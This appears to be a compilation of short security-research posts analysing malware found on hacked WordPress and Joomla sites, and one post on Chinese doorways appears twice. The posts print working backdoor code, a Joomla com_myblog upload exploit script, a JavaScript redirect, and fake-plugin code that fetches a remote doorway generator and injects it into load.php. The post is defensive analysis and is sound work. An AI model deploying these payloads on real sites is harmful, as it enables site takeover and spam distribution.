Author: Denis Sinegubko

WordPress-specific malware is slightly different than generic PHP malware. Inside WordPress files, it can use WordPress API and WordPress database. This allows to create this kind of injections:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the "render" (deobfuscated) option from the WordPress wp_options table, which it extracts using the get_option WordPress API function

This piece of code can be used both as a backdoor (say to execute arbitrary code passed in a certain request parameter), or to inject a client-side malware (it was found right after the tag in theme files). We actually found the "render" option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can\'t tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile="tq.php.jpg";
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file using a vulnerability in a really old (and it looks like, not longer supported) My Blog Joomla component.

Still some webmaster use it on Joomla 1.5.x sites and this exploit has proven to be efficient as you can read in this blogpost. This blogpost also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of this component, but also consider upgrading your site to use software that is up to date (Both Joomla and third-party components, plugins and templates)

Today we found a few websites that loaded strange code from tag-cloud-generator[.]com.

Sites tried load several image and font files from this site, but they all returned 404 Not Found. The only live file that they loaded was hxxp://www.tag-cloud-generator[.]com/js/fx2.js or it's pseudo-localized copies like hxxp://www.tag-cloud-generator[.]com/NL/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/EN/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/FR/js/fx2.js, etc.

The fx2.js files has an encrypted script that loads (randomly) one of the following scripts:

hxxp://www.tag-cLoud-generator[.]com/b01.js
hxxp://www.tag-cLoud-generator[.]com/b02.js
hxxp://www.tag-cLoud-generator[.]com/b03.js
hxxp://www.tag-cLoud-generator[.]com/b04.js

And those scripts in turn, redirect visitors to one of the following parked domains with ads:

www.rusoen[.]com
www.askinz[.]com
www.ad-u.com
www.kinkyfirehouse[.]com

Using code like this:

JavaScriptRedirectURL="http://www.ad-u[.]com/";window.top.location.href=JavaScriptRedirectURL;

All these domains, including tag-cloud-generator[.]com are registered in China. If you ever used tag-cloud-generator, make sure to remove it from your site. We will share more information if we find anything new.

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php that calls itself WP Social Include File. It downloads doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it into wp-content/mu-plugins/mu-plugin.png and then includes this file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
@file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed using a special User Agent

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.

We are seeing an increasing number of hacked sited with Chinese doorways promoting various fake merchandises (from Louis Vuitton handbags to NFL jerseys and Canada goose jackets).

Those doorways target both Western web searches and the Chinese. Here\'s how they make sure the doorway correctly preserves search queries in Chinese (converting from UTF-8 to gb2312) when they work with Google search referrer string:

if (empty($_SERVER['HTTP_REFERER'])) {
    $HTTP_Referer = "n";
} else {
    $temp = urldecode($_SERVER['HTTP_REFERER']);
    if (strpos($_SERVER['HTTP_REFERER'], 'ie=utf-8') !== false) {
        $temp = mb_convert_encoding($temp, 'gb2312', 'utf-8'); //utf-8->gb2312

    }
    $HTTP_Referer = strtolower($temp);
}

Since Google uses ie=ut-8 by default for most languages, queries using non-ASCII and non-Chinese Simplified characters will be garbled. Apparently the they are only interested in English and Chinese queries.

We are seeing an increasing number of hacked sited with Chinese doorways promoting various fake merchandises (from Louis Vuitton handbags to NFL jerseys and Canada goose jackets).

Those doorways target both Western web searches and the Chinese. Here's how they make sure the doorway correctly preserves search queries in Chinese (converting from UTF-8 to gb2312) when they work with Google search referrer string:

if (empty($_SERVER['HTTP_REFERER'])) {
    $HTTP_Referer = "n";
} else {
    $temp = urldecode($_SERVER['HTTP_REFERER']);
    if (strpos($_SERVER['HTTP_REFERER'], 'ie=utf-8') !== false) {
        $temp = mb_convert_encoding($temp, 'gb2312', 'utf-8'); //utf-8->gb2312

    }
    $HTTP_Referer = strtolower($temp);
}

Since Google uses "ie=ut-8" by default for most languages, queries using non-ASCII and non-Chinese Simplified characters will be garbled. Apparently the they are only interested in English and Chinese queries.

We see many tricks that hackers use to make search engine bots think that the injected spam is not hidden. One of the common approaches is to place a spam block inside a div with some particular id or class and then add a JavaScript call to make that div invisible.

And the newest form of the unlocked iphone spam injection, tried something new (that also made us smile). It uses elementary school level math to make spammy a div id and the id in JavaScript to look different.

Here\'s the typical code:

<div id="232">...spammy content here...</div><script>document.getElementById (116*2) .style.display='none';</script>

The idea is simple: malware generates a random number (e.g. n) and then doubles that number and uses the result as the spam div id. And in the JavaScript code, they use the same multiplication operation verbatim as the getElementById(n*2) function parameter, which works because JavaScript implicitly converts numbers to strings.